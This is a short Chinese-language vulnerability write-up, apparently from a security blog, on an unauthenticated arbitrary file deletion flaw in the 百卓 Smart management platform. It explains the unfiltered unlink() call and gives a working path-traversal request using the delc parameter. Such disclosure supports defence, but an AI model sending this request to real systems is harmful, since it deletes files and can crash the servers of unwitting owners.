百卓Smart管理平台 useratte/layer_swich_conf.php 任意文件删除漏洞


漏洞简介

百卓Smart管理平台是北京百卓网络技术有限公司(以下简称百卓网络)的一款安全网关产品,是一家致力于构建下一代安全互联网的高科技企业。
百卓Smart管理平台 useratte/layer_swich_conf.php 接口存在任意文件删除漏洞。未经身份验证的攻击者可以利用此漏洞删除服务器上任意文件,造成系统崩溃不可运行。

漏洞分析

layer_swich_conf.php 主要业务逻辑代码如下

image-20250119215256649

直接对传入的 delc 值拼接到 unlink函数后的文件路径上,无任何过滤,造成任意文件删除漏洞。

漏洞复现

可通过其他漏洞如文件上传、sql注入写入文件后测试

image-20250120203335970

GET /useratte/layer_swich_conf.php?delc=../../home/1.php HTTP/1.1
Host: smart.mrxn.net

删除后,再次访问之前的文件,已经404了,成功删除了该文件

image-20250120203555472


手机扫码阅读

新中新校园卡管理系统 ProductInfoJF SQL注入漏洞

百卓Smart管理平台 uploadfile.php 文件上传漏洞

评 论